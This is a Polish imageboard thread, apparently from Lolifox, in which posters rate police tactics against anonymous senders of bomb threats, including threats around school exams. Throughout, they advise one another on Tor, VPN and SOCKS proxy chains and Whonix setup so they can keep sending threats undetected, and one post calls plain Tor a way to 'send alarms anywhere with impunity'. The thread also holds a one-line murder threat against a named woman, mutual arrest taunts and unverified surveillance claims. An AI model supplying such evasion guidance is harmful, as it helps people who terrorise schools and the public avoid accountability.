[ Home / Boards / Banlist / Search / Login / Tor mirror / Overboard / Create / Wiki (BETA) ]

/poland/ - Poland

Catalog

Name
Email
Subject
Comment *
File
* = required field[▶ Show post options & limits]
Options
Password (For file and post deletion.)

Allowed file types:jpg, jpeg, gif, png, mp3, webm, mp4
Max filesize is 32 MB.
Max image dimensions are 10000 x 10000.
You may upload 5 per post.


 No.31502[Last 50 Posts]

File: 1592232903815.jpg (1.23 KB, 40x40, 1:1, h.jpg)

METODY OPERACYJNE SŁUŻB NA LOLIFOX

jak działają służby, jak rozpoznawać, jak się chronić przed manipulacją

1. WYŚMIEWANIE, OBRAŻANIE, PONIŻANIE PRZESTĘPCÓW

MODUS OPERANDI: profilerka sprofilowała sprawcę jako "ktoś, kto ma poważne problemy ze swoją psychiką, brakuje mu uznania i podziwu oraz ma spory żal do otaczającego go świata". dlatego troglodyci ze służb wpadli na pomysł wyśmiewania i poniżania, myśleli że może wtedy się zniechęci i odpuści

OCENA: 0/10 katastrofalna metoda, to ona doprowadziła do eskalacji konfliktu i pierwszych alarmów maturalnych. żadna inna metoda nie przyniosła tyle szkód polsce

2. UDAWANIE STYLU PISMA PRZESTĘPCÓW

MODUS OPERANDI: po swojej deanonimizacji Łukasz Jędrzejczak stwierdził że wszystko by się udało gdyby "pisał po żulersku". dlatego polecił swoim podwładnym udawać nasz styl pisma. metoda jest używana w połączeniu z pierwszą, żeby sprawić wrażenie że to inny lolifoksiarz cię wyśmiewa

OCENA: 0/10 metoda korzystna dla nas, nawet jeśli służby wiedzą które posty są ich, to amatorzy stylometrii spoza służb mają większe problemy z rozpoznawaniem naszych postów. zalecam wszystkim pisać tym stylem pisma, jest to bardzo korzystne dla anonimowości

3. OSKARŻANIE O BYCIE ROSJANAMI

MODUS OPERANDI: Łukasz Jędrzejczak wpadł na pomysł jak zrobić karierę. prowadzi akcję wywiadowczą przeciwko rosyjskim szpiegom w Służbie Kontrwywiadu Wojskowego

OCENA: 1/10 bomberzy wiedzą że są bezkarni i nikt ich nie namierzył. czują się jak bogowie którymi są. daję jeden punkt w górę bo Jędrzejczak dzięki tej metodzie robi karierę

4. TOR NIE DZIAŁA, ZAMIAST TEGO TRZEBA VPN

MODUS OPERANDI: zniechęcają ludzi do Tora i wmawiają jakieś gówna

OCENA: 3/10 dla nas może wydawać się to śmieszne, ale mnóstwo głupków się nabrało i wpadło w ręce policji

5. BLOKOWANIE TORA NA STRONACH JAK WYKOP, OLX, FACEBOOK

MODUS OPERANDI: blokowanie Tora

OCENA: 5/10 dobra metoda, wszyscy oprócz kilku osób w polsce wchodzą z clearnetu. daję tylko 5 punktów bo głupki z policji i tak nie potrafią tego wykorzystać i szybko złapać clearneciaków

6. FORA Z NICKAMI, ZAPROSZENIAMI

MODUS OPERANDI: nicki i zaproszenia rozpierdalają anonimowość

OCENA: 5/10 dobra metoda. daję tylko 5 punktów bo Jędrzejczak i Vegeta sami padli jej ofiarą xD

7. ZIMNY ODCZYT

MODUS OPERANDI: twój kolega cię wsypał. rozmawiałeś z nim w innym miejscu w sieci, a on nam wszystko opowiedział. jesteś młodym chłopakiem, zawsze byłeś najlepszym uczniem w klasie, a potem zorientowałeś się że zostałeś wyruchany i kiedy ty marnowałeś swoją młodość inni przeżywali pierwsze miłości. my już wszystko wiemy, twój kolega cię zdradził. opsec nie działa wstecz, kiedyś pisałeś z clearnetu na portalach społecznościowych, byliśmy w stanie to odszukać. kiedyś korzystałeś z Norda, wszystko się nagrało. wkrótce przyjdzie do ciebie awizo, a kiedy pójdziesz na pocztę zostaniesz zatrzymany

OCENA: 7/10 skuteczna metoda, jest w stanie mocno nastraszyć przestępców. dlatego trzeba nieustanie pamiętać że policja wykorzysta metodę "twój kolega cię wsypał" i będzie to absolutne kłamstwo

8. TOR NIE GWARANTUJE 100% ANONIMOWOŚCI, DO ALARMÓW BOMBOWYCH MUSISZ MIEĆ JESZCZE

MODUS OPERANDI: musisz mieć jeszcze modemy, karty na słupa, telefony, jechać do innego miasta, po wysłaniu jednego alarmu wyrzucać do śmieci, musisz korzystać z publicznego wifi, VPN, VPS, RDP, VNC przed i za Torem, a i tak mogą cię odszukać

OCENA: 9/10 bardzo skuteczna metoda, ma ogromne zasługi dla prewencji cyberprzestępstw. sam kiedyś dałem się nabrać. na szczęście dzięki bomberom maturalnym wiadomo że nikt nie monitoruje ruchu sieciowego polaków

są metody 10/10 ale polskie służby są za głupie i ich nie stosują, dlatego nie ma sensu wymieniać

 No.31503

>dzięki bomberom maturalnym wiadomo że nikt nie monitoruje ruchu sieciowego polaków

Poprawna pisownia: "Polaków", Mishka.

Nieprawda:

Dowód na to, że policja szkoli się z używanych przez siebie systemów monitorowania i analizy ruchu sieciowego:

http://bip.mazowiecka.policja.gov.pl/download/40/81859/Ogloudzielzamowds.pdf

A to TYLKO policja. Polskie służby specjalne mają teraz dostęp do technologii NSA jakich nie byłbyś nawet w stanie sobie wyobrazić.

>troglodyci ze służb wpadli na pomysł wyśmiewania i poniżania, myśleli że może wtedy się zniechęci i odpuści

>katastrofalna metoda, to ona doprowadziła do eskalacji konfliktu i pierwszych alarmów maturalnych. żadna inna metoda nie przyniosła tyle szkód polsce

Poprawna pisownia: "Polsce", Mishka.

Wszyscy tutaj mający IQ większe niż dwucyfrowe wiedzą już dobrze, że nie ma i nigdy nie było żadnych "poslkcih nastolatków za Torem" tylko grupka kacapów z rezydentury w Sankt Petersburgu zasilająca ruską lodówkę w mięsko nawinych polskich dzieci.

Wiesz, kto was obraża, Mishka? Odreagowujące poczucie bycia przez was oszukanymi polskie dzieci.

>TOR NIE DZIAŁA, ZAMIAST TEGO TRZEBA VPN

Tor nie działa, VPN nic nie zmienia. Korelacja ruchu sieciowego jest już możliwa do wykonania w skali globalnej. Wymiana tytanu na dostęp do danych NSa pozwala poslkim służbom demaskować użytkowników Tor.


 No.31546

Pani Martyna zostanie zamordowana


 No.31563

>>31546

>Pani Martyna zostanie zamordowana

jaka pani Martyna?


 No.31567

>>31563

>jaka pani Martyna?

tak sobie napisałem żeby podbić temat, a czemu pytasz?


 No.31572

>>31567

>tak sobie napisałem żeby podbić temat

widziałem, "pani Martyna ginie" usunąłeś

>a czemu pytasz?

wcześniej nie pojawiało się to imię


 No.31597

>>31572

>widziałem, "pani Martyna ginie" usunąłeś

nic nie usuwałem, mój post nadal jest


 No.31638

8. TOR JEST ROZPRACOWANY

MODUS OPERANDI: ludzie używali Tor do anonimowości i mimo to wpadli, teraz siedzą w więzieniu, nie klikaj ikonki bo ciebie też złapiemy

OCENA: 8/10 bardzo skuteczna metoda, zmniejsza zaufanie do Tor i tym samym zniechęca do używania go mimo że praktycznie wszystkie przypadki deanonimizacji są udokumentowane i najczęściej osoby popełniły błędy opsec, w bardzo rzadkich przypadkach był to exploit

9. LODÓWKA

MODUS OPERANDI: forum obrazkowe Lolifox jest honeypotem policji na którym zachęca do przestępstw by wyłapywać komputerowców, zamiast aresztu trafiają do Lodówki służb - tajnej listy osób które za wolność muszą wykonywać misje, w innym przypadku trafią do więzienia

OCENA: 1/10 Lodówka miała efekt odwrotny od zamierzonego i szybko stała się memem, użytkownicy naśmiewają się z żenujących prób policji i narzekają że mimo tylu przestępstw nie wyskoczyła im żadna misja na minimapce. daję jeden punkt za kreatywność

10. PODWAŻANIE NARZĘDZI UŻYWANYCH PRZEZ PRZESTĘPCÓW

MODUS OPERANDI: używamy zaszyfrowanego Linuxa z Whonixem w Virtualboxie, ale czy Virtualbox na pewno jest bezpieczny i nie ma exploitu który wyskoczy z maszyny wirtualnej? LUKS na pewno jest silny? systemd nie został poprawnie zweryfikowany. wszystko jest niebezpieczne!

OCENA: 6/10 może przestraszyć osobę nową albo paranoiczną ale prawda jest taka że policja nie umie zrobić najprostszego exploita a te amerykańskie też proste i tanie nie są

11. POLICJANT SAGE!

MODUS OPERANDI: policjant który podpisuje się takim czerwonym SAGE! namawia młodzież do złych rzeczy

OCENA:-1/10 taką głupotę mogą tylko wymyślić policyjne głupki, ten sam SAGE! postuje na każdym imageboardzie świata

12. "BEZPIECZNE" ALTERNATYWY

MODUS OPERANDI: są lepsze alternatywy których policja nie umie rozpracować jak openbsd, bitmessage i inne narzędzia

OCENA: 0/10 zniechęca i wpierdala na minę jednocześnie ale nieskutecznie bo dobrze wiemy z czym polska policja sobie nie radzi

13. W INTERNECIE NIE MA ANONIMOWOŚCI

MODUS OPERANDI: nie da się w internecie być anonimowym, jest to niemożliwe

OCENA: 2/10 głupki się nabierają a lolifoxi udowadniają że jednak jest anonimowość, ta metoda będzie sporo kosztować policję jak 10 raz ta sama placówka będzie ewakuowana


 No.31639

sugerujesz ze tu wiekszosc to sluzby


 No.31641

>>31502

>>31638

dobry post, chyba wszystko wzięte pod uwagę

szanuję


 No.31642

>wszystkie przypadki deanonimizacji są udokumentowane i najczęściej osoby popełniły błędy opsec

Kłamstwo:

https://blog.torproject.org/new-low-cost-traffic-analysis-attacks-mitigations

>forum obrazkowe Lolifox jest honeypotem policji na którym zachęca do przestępstw by wyłapywać komputerowców, zamiast aresztu trafiają do Lodówki służb

Kłamstwo. Historyjkę o lodówce napisał dzieciak-konfabulant.

>le czy Virtualbox na pewno jest bezpieczny i nie ma exploitu który wyskoczy z maszyny wirtualnej?

Są takie exploity, a współpracująca z NSA firma Oracle odmawia uwzględnienia poprawek bezpieczeństwa kodu od społeczności opensource:

https://people.debian.org/~lucas/virtualbox-buster/

Wyskakiwanie z maszynki wirtualnej na zewnątrz i przejmowanie kontroli nad hostem:

https://www.scmagazine.com/home/security-news/oracles-virtualbox-vulnerability-leaked-by-disgruntled-researcher/

A tutaj paczka DZIESIĘCIU kolejnych dziurawości w Virtualbox pozwalających na wyskoczenie na host:

https://www.techrepublic.com/article/10-new-vm-escape-vulnerabilities-discovered-in-virtualbox/

>systemd nie został poprawnie zweryfikowany

Systemd jest dziurawy:

Luki w systemd:

https://bsdmag.org/randy_w_3/

https://forums.freebsd.org/threads/linuxs-systemd-can-be-pwned-via-an-evil-dns-query.61441/

https://forums.gentoo.org/viewtopic-t-1052400.html

https://latesthackingnews.com/2018/11/02/systemd-vulnerability-in-linux-could-trigger-remote-attacks-and-system-crashes/

https://securityaffairs.co/wordpress/77470/hacking/systemd-security-flaw.html

https://usn.ubuntu.com/3816-2/

https://www.cbronline.com/news/systemd-vulnerabilities-qualys

https://www.infosecurity-magazine.com/news/linux-systemd-vulnerability-dns

https://www.openlogic.com/blog/2019-begins-systemd-vulnerability

https://www.theregister.co.uk/2017/06/29/systemd_pwned_by_dns_query/

O słabościach projektowych i kryptograficznych LUKS opowiem w osobnym poście.

>są lepsze alternatywy których policja nie umie rozpracować jak openbsd

Zgadza się. W rzeczywistości nikt nie potrafi "rozpracować" OpenBSD:

OpenBSD is a SECURITY-FOCUSED, free and open-source, Unix-like operating system based on the Berkeley Software Distribution (BSD). Theo de Raadt created OpenBSD in 1995 by forking NetBSD. According to de Raadt, OpenBSD is a research operating system for developing SECURITY MITIGATIONS. The OpenBSD project maintains portable versions of many subsystems as packages for other operating systems. Because of the PROJECT'S EMPHASIS ON CODE QUALITY, many components are reused in other software projects.

OpenBSD includes numerous features designed to improve security, such as:

Secure alternatives to POSIX functions in the C standard library, such as strlcat for strcat and strlcpy for strcpy[30]

Toolchain alterations, including a static bounds checker[31]

Memory protection techniques to guard against invalid accesses, such as ProPolice and the W^X page protection feature

Strong cryptography and randomization[32]

System call and filesystem access restrictions to limit process capabilities[4]

To reduce the risk of a vulnerability or misconfiguration allowing privilege escalation, many programs have been written or adapted to make use of PRIVILEGE SEPARATION, PRIVILEGE REVOCATION AND CHROOTING. Privilege separation is a technique, pioneered on OpenBSD and inspired by the principle of least privilege, where a program is split into two or more parts, one of which performs privileged operations and the other—almost always the bulk of the code—runs without privilege.

The project has A POLICY OF CONTINUALLY AUDITING SOURCE CODE FOR PROBLEMS, work that developer Marc Espie has described as "never finished … more a question of process than of a specific bug being hunted." He went on to list several typical steps once a bug is found, including examining the entire source tree for the same and similar issues, "try[ing] to find out whether the documentation ought to be amended", and investigating whether "it's possible to augment the compiler to warn against this specific problem."

One of the fundamental ideas behind OpenBSD is a drive for systems to BE SIMPLE, CLEAN, AND SECURE BY DEFAULT. The default install is quite minimal, which the project states is to ensure novice users "do not need to become security experts overnight", which fits with open-source and code auditing practices considered important elements of a security system.

>policja nie umie zrobić najprostszego exploita a te amerykańskie też proste i tanie nie są

Wystarczająco skuteczne przeciwko dzieciom z lolifoxa exploity są darmowe, w Internecie. A te amerykańskie są dostępne dla polskich służb w zamian za tytan. Tak więc nie ma problemu by wniknąć na każdy komputer z Windowsem albo "jakimkolwiek linuxem".


 No.31695

>BLOKOWANIE TORA NA STRONACH JAK WYKOP, OLX, FACEBOOK

przecierz pisałeś że żadna z tych stron nie blokuje tora


 No.31696

>>31695

>przecierz pisałeś że żadna z tych stron nie blokuje tora

kurwaaaaaa xDDDD

pisałem że można wchodzić z Tora ale trzeba dodać proxy


 No.31698

>pisałem że można wchodzić z Tora ale trzeba dodać proxy

szkalowałeś proxy z vip72


 No.31699

>>31696

>pisałem że można wchodzić z Tora ale trzeba dodać proxy

czyli blokują Tor xD


 No.31703

>>31699

szkalowałeś proxy z vip72

vip72 jest może dobry ale do opowiadania bajek dzieciom na cebulce.


 No.31704

>>31699

>czyli blokują Tor xD

tak pisałem, ale ludzie nie rozumieją że trzeba do Tor dodać proxy


 No.31705

>>31698

>szkalowałeś proxy z vip72

szkalowałem policyjnych głupków którzy nie rozumieją o co chodzi i wymyślają łańcuszki laptop → modem na słupa → publiczne wifi → VPN → VPS → Tails → Whonix → Nord → vip72 → powershell → VPN → VPS

ale chyba oni naprawdę nie rozumieją o co chodzi i dlaczego ich szkaluję xD


 No.31706

>>31704

>>31705

>>31703

Uwaga to pisze Vegeta!!! Obraził się na cebulkę, że udostępnili payload na jego serwer vps.


 No.31708

>szkalowałem policyjnych głupków którzy nie rozumieją o co chodzi

oceń proszę poniższe rozwiązania w skali od 1 do 10

a. clearnet -> tor -> socks

b. clearnet -> vpn -> tor -> socks

c. clearnet -> vpn -> tor -> inny vpn

d. clearnet -> tor -> vpn


 No.31709

>>31708

>a. clearnet -> tor -> socks

9

>b. clearnet -> vpn -> tor -> socks

8

>c. clearnet -> vpn -> tor -> inny vpn

0

>d. clearnet -> tor -> vpn

1


 No.31710

>>31708

Czemu jak łącze się z vip na whonix do przeglądarka wyrzucą "proxy server refused" connection. Wam tak działa?


 No.31711

>>31710

>Czemu jak łącze się z vip na whonix do przeglądarka wyrzucą "proxy server refused" connection

przetestuj darmowe proxy z http://spys.one/free-proxy-list/PL/

wtedy będziesz wiedzieć czy to wina vip72 czy twojego komputera

>Wam tak działa?

nie mam najmniejszych problemów z połączeniem


 No.31714

Mi nie działa. Pomożesz? Chciałbym mieć socks5 w Whonix.


 No.31715

Muszę coś ustawić na getaway whonix?


 No.31717

>>31714

>Mi nie działa.

http://spys.one/free-proxy-list/PL/ nie działa?

do jakiej przeglądarki wpisujesz adres IP i port?

>Pomożesz? Chciałbym mieć socks5 w Whonix.

pomogę

>>31715

>Muszę coś ustawić na getaway whonix?

absolutnie nie


 No.31718

>>31715

>Muszę coś ustawić na getaway whonix?

nic nie przestawiaj w Gateway bo popsujesz i zostaniesz zdeanonimizowany

wszystko się robi w Workstation


 No.31720

>>c. clearnet -> vpn -> tor -> inny vpn

>0

Kłamstwo. Systemy śledzenia w sieci od razu widzą, że używany jest Tor i aktywowany jest NetFlow.

>>d. clearnet -> tor -> vpn

>1

Kłamstwo. Manipulacja przepływnoscią ruchu VPN pozwala na znakowanie ruchu sieciowego w naszym obwoedzie Tor i natychmiastową deanonimizację.

Punktację przyznawał albo totalny laik albo policjant.


 No.31723

>>31720

>Punktację przyznawał albo totalny laik albo policjant.

proszę bardzo, będziemy dyskutować

>clearnet -> tor

10

najlepsza możliwa opcja, jesteś całkowicie anonimowy, możesz bezkarnie wysyłać alarmy wszędzie

>a. clearnet -> tor -> socks

9

trochę gorsza opcja, bo na stronach na które wchodzisz przez socks jesteś pseudonimowy a nie anonimowy, ale nadal jest to wystarczająca ochrona przed służbami

>clearnet -> vpn -> tor

9

trochę gorsza opcja, vpn może cię śledzić i teczkować, vpn w przeciwieństwie do polskich isp może mieć systemy monitorowania ruchu, ale nadal jesteś bezkarny

>b. clearnet -> vpn -> tor -> socks

8

jeden punkt mniej za socks (wytłumaczone powyżej) i jeden punkt mniej za vpn (wytłumaczone powyżej)

>d. clearnet -> tor -> vpn

1

vpn za Torem rozpierdala anonimowość Tora, tylko kompletny głupek zrobiłby coś takiego, poza tym trzeba byłoby włączać UDP we Whonix które jest zablokowane i słusznie

>c. clearnet -> vpn -> tor -> inny vpn

0

śledzenie podwójne, dałem ocenę poza skalą, bo trzeba było jakoś odróżnić od tor -> vpn który dostał ocenę minimalną


 No.31724

>>31717

Whonix workstation to Tor Browser. Klikam w ustawienia proxy, wybieram typ proxy w zależności od tego jakie wybiore z stronki. Cały czas "proxy refusing conections". Pingnąłem serwer i na pewno działa.


 No.31725

>>31724

>Whonix workstation to Tor Browser. Klikam w ustawienia proxy, wybieram typ proxy w zależności od tego jakie wybiore z stronki. Cały czas "proxy refusing conections". Pingnąłem serwer i na pewno działa.

nie wpisuj do Tor Browser, tylko do Firefox

wpisz do Firefox i wszystko będzie działać


 No.31726

Jak zainstalować firefox w Whonix?


 No.31728

>clearnet -> tor

>najlepsza możliwa opcja, jesteś całkowicie anonimowy, możesz bezkarnie wysyłać alarmy wszędzie

Nie. Używanie Tora bez zamaskowania tego faktu natychmiast stawia nas na celowniku wielu automatycznych narzędzi słuzb SIGINT. Dowody i przykłady na przykład w wyciekach Snowdena. Od dawna ta aparatura NSA działa w Polsce, o czym pisano nawet na panoptykonie. Nie jesteś na bieżąco. Wstyd.

>a. clearnet -> tor -> socks

>trochę gorsza opcja, bo na stronach na które wchodzisz przez socks jesteś pseudonimowy a nie anonimowy, ale nadal jest to wystarczająca ochrona przed służbami

Nie rozumiesz pojęcia pseudonimowości, skoro uważasz ją w tym kontekście za gorszą opcję. Jesteś laikiem lub policjantem. Pesudonimowość stałego wyjścia socks jest ogromną zaletą, jeśli odwiedzane strony (bankowe, płatnicze, instytucjonalne) nie mają od razu dostać wysypki na Tora. Jak inaczej chcesz udawać jedną osobę na łączu ze stałym poslkim IP?

>clearnet -> vpn -> tor

>trochę gorsza opcja, vpn może cię śledzić i teczkować, vpn w przeciwieństwie do polskich isp może mieć systemy monitorowania ruchu, ale nadal jesteś bezkarny

Znowu próbujesz przemycić kłamstwo, że polscy ISP nie mają monitorowania ruchu. Otóż mają, wszyscy, nawet ci którzy "nie mają", bo mają takie systemy "ISP dla ISP", na przykład Exatel. Więc nawet jeśli osiedlowy ISP nie wdroży pełnowartościowej kancelarii tajnej, to nic z ruchu sieciowego jego klientów nie umknie służbom.

>vpn za Torem rozpierdala anonimowość Tora, tylko kompletny głupek zrobiłby coś takiego, poza tym trzeba byłoby włączać UDP we Whonix które jest zablokowane i słusznie

Tak. I to nietety jedyny punkt w którym masz rację.

>c. clearnet -> vpn -> tor -> inny vpn

>śledzenie podwójne, dałem ocenę poza skalą, bo trzeba było jakoś odróżnić od tor -> vpn który dostał ocenę minimalną

Tak, tylko z powodu części "VPN za Tor".


 No.31729

Czy mogę się raz dowiedzieć oprócz spamu?

Jak zainstalować firefox w Whonix?!?!


 No.31730

>>31729

>Jak zainstalować firefox w Whonix?!?!

otwierasz konsolę

sudo apt-get install firefox-esr


 No.31732

>lolifox to najbardziej niebezpieczne forum wywrotowe

>Jak zainstalować firefox w Whonix?!?!

xD


 No.31733

>>31728

>Używanie Tora bez zamaskowania tego faktu natychmiast stawia nas na celowniku wielu automatycznych narzędzi słuzb SIGINT

co z tego skoro nic nie wiedzą co robię?

>Pesudonimowość stałego wyjścia socks jest ogromną zaletą, jeśli odwiedzane strony (bankowe, płatnicze, instytucjonalne)

do przeglądania internetu to kiepska opcja bo wszystko trafia do jednej teczki

>Więc nawet jeśli osiedlowy ISP nie wdroży pełnowartościowej kancelarii tajnej, to nic z ruchu sieciowego jego klientów nie umknie służbom

sporo umknęło bo dalej jestem na wolności

>Tak. I to nietety jedyny punkt w którym masz rację.

xD


 No.31734

>>31728

>Nie. Używanie Tora bez zamaskowania tego faktu natychmiast stawia nas na celowniku wielu automatycznych narzędzi słuzb SIGINT. Dowody i przykłady na przykład w wyciekach Snowdena. Od dawna ta aparatura NSA działa w Polsce, o czym pisano nawet na panoptykonie. Nie jesteś na bieżąco. Wstyd.

Dobre fantazje. Nikt nie monitoruje ruchu sieciowego Polaków, ani służby, ani operatorzy. Nie ma do tego narzędzi, sprzętu, ludzi, o przepisach nie wspominając. Koszty są ogromne i nikt nie chce płacić ;)

>Nie rozumiesz pojęcia pseudonimowości, skoro uważasz ją w tym kontekście za gorszą opcję. Jesteś laikiem lub policjantem. Pesudonimowość stałego wyjścia socks jest ogromną zaletą, jeśli odwiedzane strony (bankowe, płatnicze, instytucjonalne) nie mają od razu dostać wysypki na Tora. Jak inaczej chcesz udawać jedną osobę na łączu ze stałym poslkim IP?

zalecam używanie Tor → socks w celu logowania się do banków, kantorów, portali społecznościowych

anonimowość będzie mniejsza niż w przypadku samego Tora

będzie to nadal akceptowalny poziom anonimowości

>Znowu próbujesz przemycić kłamstwo, że polscy ISP nie mają monitorowania ruchu. Otóż mają, wszyscy, nawet ci którzy "nie mają", bo mają takie systemy "ISP dla ISP", na przykład Exatel. Więc nawet jeśli osiedlowy ISP nie wdroży pełnowartościowej kancelarii tajnej, to nic z ruchu sieciowego jego klientów nie umknie służbom.

Dobre fantazje. Nikt nie monitoruje ruchu sieciowego Polaków, ani służby, ani operatorzy. Nie ma do tego narzędzi, sprzętu, ludzi, o przepisach nie wspominając. Koszty są ogromne i nikt nie chce płacić ;)


 No.31736

Ah ci cebulkowicze ;)


 No.31738

>>31736

>Ah ci cebulkowicze ;)

zainstalowałeś już Firefox?

otwierasz konsolę

sudo apt-get install firefox-esr


 No.31739

>>Używanie Tora bez zamaskowania tego faktu natychmiast stawia nas na celowniku wielu automatycznych narzędzi słuzb SIGINT

>co z tego skoro nic nie wiedzą co robię?

Wiedzą, szybko, tanio i skutecznie: https://blog.torproject.org/new-low-cost-traffic-analysis-attacks-mitigations

>>Więc nawet jeśli osiedlowy ISP nie wdroży pełnowartościowej kancelarii tajnej, to nic z ruchu sieciowego jego klientów nie umknie służbom

>sporo umknęło bo dalej jestem na wolności

Jeśli przez wolność rozumiesz "jestem w domu u Mamy a nie w więzieniu", to tak, masz rację. Jeśli jednak rozumiesz przez to "służby nie wiedzą kim jestem i nie monitorują mnie dokładniej" to niestety, ale całkowicie się mylisz. Ten sam los spotkał wielu samozwańczych "bojowników" z lolifox.


 No.31740

>>31734

Nawet prosta policja ma narzędzia i szkolenia z monitorowania ruchu:

http://bip.mazowiecka.policja.gov.pl/download/40/81859/Ogloudzielzamowds.pdf


 No.31741

>zainstalowałeś już Firefox?

Nie :(

>Unable to acquire the dpkg frontend lock


 No.31743

>>31741

Tak to jest jak się psiurki cebulki za linuxa biorą ;)


 No.31744

>>31739

>Wiedzą, szybko, tanio i skutecznie

atak teoretyczny

>Jeśli jednak rozumiesz przez to "służby nie wiedzą kim jestem i nie monitorują mnie dokładniej" to niestety, ale całkowicie się mylisz

napisz coś szczegółowego o mnie

>Ten sam los spotkał wielu samozwańczych "bojowników" z lolifox.

ciebie spotka coś gorszego

>>31740

>Nawet prosta policja ma narzędzia i szkolenia z monitorowania ruchu:

korelowanie clearneciaków xD


 No.31745

>>31738

>zainstalowałeś już Firefox?

>otwierasz konsolę

>sudo apt-get install firefox-esr

Co mam zrobić? Wpisuje

sudo apt install firefox-esr i pojawia się

> Unable to acquire the dpkg frontend lock

Czy ktoś tu ma pojęcie jak to zrobić?


 No.31746

>>Wiedzą, szybko, tanio i skutecznie

>atak teoretyczny

Kłamstwo. Opisany atak, co każdy może sprawdzić w jego dokumentacji (podlinkowanej na stronie Tor Project), był testowany na sieci Tor.

>>Jeśli jednak rozumiesz przez to "służby nie wiedzą kim jestem i nie monitorują mnie dokładniej" to niestety, ale całkowicie się mylisz

>napisz coś szczegółowego o mnie

Piszę cały czas. Materiały do aktu oskarżenia muszą być wyczerpujące.

>>Ten sam los spotkał wielu samozwańczych "bojowników" z lolifox.

>ciebie spotka coś gorszego

Nie wiesz kim jesteś. Dowiesz się dopiero na sali sądowej, gdy będę prezentował twoje winy.

>>Nawet prosta policja ma narzędzia i szkolenia z monitorowania ruchu:

>korelowanie clearneciaków xD

Nie. System NetFlow może być bez problemu używany do deanonimzacji narzędzi takich jak Tor.


 No.31747

>zainstalowałeś już Firefox?

>otwierasz konsolę

>sudo apt-get install firefox-esr

Co mam zrobić? Wpisuje

sudo apt install firefox-esr i pojawia się

> Unable to acquire the dpkg frontend lock

Czy ktoś tu ma pojęcie jak to zrobić?


 No.31748

XDDDDDDDDDDDDDDDDDDDDDDDD

Psiurki nie wiedzą. Skąd mają wiedzieć?


 No.31749

>>31746

>Kłamstwo. Opisany atak, co każdy może sprawdzić w jego dokumentacji (podlinkowanej na stronie Tor Project), był testowany na sieci Tor.

te ataki działają na niewielką grupę użytkowników, przykładowo w samplu jest 20 Torowiczów i zostają rozpracowani

zrób tak przy setkach tysięcy podłączonych jednocześnie

>Piszę cały czas. Materiały do aktu oskarżenia muszą być wyczerpujące.

xD

>Nie wiesz kim jesteś. Dowiesz się dopiero na sali sądowej, gdy będę prezentował twoje winy.

>Nie wiesz kim jesteś

napiszesz moje życie w sądzie?

>Nie. System NetFlow może być bez problemu używany do deanonimzacji narzędzi takich jak Tor.

mówisz tak od roku i nic się nie stało

czas nie działa na twoją korzyść

>>31747

>Czy ktoś tu ma pojęcie jak to zrobić?

podałeś hasło? standardowo jest changeme ale na pewno zmieniłeś nie?


 No.31750

>Psiurki nie wiedzą. Skąd mają wiedzieć?

Ty też jakoś nie wiesz. Jak byś wiedział to napisałbyś.


 No.31751

>>31747

>sudo apt install firefox-esr i pojawia się

> Unable to acquire the dpkg frontend lock

za głupi na Linux jesteś

zaimportuj Windows jako Internal Network Whonix

ustaw internet

zainstaluj Firefox klikając w Firefox.exe

wpisz proxy

>>31749

>podałeś hasło? standardowo jest changeme ale na pewno zmieniłeś nie?

myślę że on Whonix na obrazku widział, a teraz kłamie


 No.31752

>>31750

Robi się jakiś update w tle. Może tor browser się aktualizuje?

Wpisz

sudo ps aux | grep dpkg

Zabijsz wszystkie procesy dpkg

kill

sudo apt install firefox-er

Od razu ci mówię że nie ustanowisz połaczenia z serwerem proxy w sposób jaki opisał to psiurek wyżej ;)

O ten:

>31717

Z cebulki przyszła jakaś dziwna moda na ten setup. Xerror alias Krang to naczął. Widać nigdy nie robił. Psiurki tym bardziej. Po prostu Krang porwał tłumy ;)


 No.31754

>>Kłamstwo. Opisany atak, co każdy może sprawdzić w jego dokumentacji (podlinkowanej na stronie Tor Project), był testowany na sieci Tor.

>te ataki działają na niewielką grupę użytkowników, przykładowo w samplu jest 20 Torowiczów i zostają rozpracowani

Żaden problem poszerzyć sobie zakres nawet do 100% użytkownikó sieci w Polsce dzięki wydatnej pomocy firm takich jak Exatel.

>zrób tak przy setkach tysięcy podłączonych jednocześnie

Tak właśnie robię. Nie występują żadne problemy z identyfikacją ruchu poszczególnych użytkowników.

>>Piszę cały czas. Materiały do aktu oskarżenia muszą być wyczerpujące.

>xD

Czy "xD" będzie twoją linią obrony? Nie wróżę jej wielkiej skuteczności.

>napiszesz moje życie w sądzie?

Ty już je napisałeś. Jako tragedię z żałosnym przebiegiem i smutnym końcem.

>>Nie. System NetFlow może być bez problemu używany do deanonimzacji narzędzi takich jak Tor.

>mówisz tak od roku i nic się nie stało

Tak, wiem, czujesz się bezpieczny w domku. I tak ma być, nie chcemy byś zwiał, zanim, przyjdziemy po ciebie o 6:00 rano. Ty sam jesteś mało wartą rybką, ale ładnie się błyszczysz i przyciągasz inne złe rybki które bardziej chcemy złapać.

>czas nie działa na twoją korzyść

Wręcz przeciwnie. Kochamy czas, bo każda sekunda twojego "bojownikowania" w sieci generuje nam świetne materiały.


 No.31755

>>31752

>Od razu ci mówię że nie ustanowisz połaczenia z serwerem proxy w sposób jaki opisał to psiurek wyżej ;)

Vegeta nie umie połączyć Whonix z proxy xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

i oni mają nas rozpracować xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD


 No.31756

ten temat to idealny przykład metod xD

metody stosowane przez Łukasza Jędrzejczaka

3. OSKARŻANIE O BYCIE ROSJANAMI

7. ZIMNY ODCZYT

8. TOR NIE GWARANTUJE 100% ANONIMOWOŚCI, DO ALARMÓW BOMBOWYCH MUSISZ MIEĆ JESZCZE

metody stosowane przez Vegetę

4. TOR I SOCKS NIE DZIAŁA, ZAMIAST TEGO TRZEBA VPS


 No.31758

>>31638

>policjant który podpisuje się takim czerwonym SAGE! namawia młodzież do złych rzeczy

wskaż jego posty


 No.31759

>>31754

>Żaden problem poszerzyć sobie zakres nawet do 100% użytkownikó sieci w Polsce dzięki wydatnej pomocy firm takich jak Exatel.

xD nie da się udowodnić winy korelując, nikt nie uwierzy w "AKURAT jak on używał Tor BYŁO PRZESTĘPSTWO! TO ON!"

>Tak właśnie robię. Nie występują żadne problemy z identyfikacją ruchu poszczególnych użytkowników.

czyli zidentyfikowałeś wszystkich poza lolifoxami

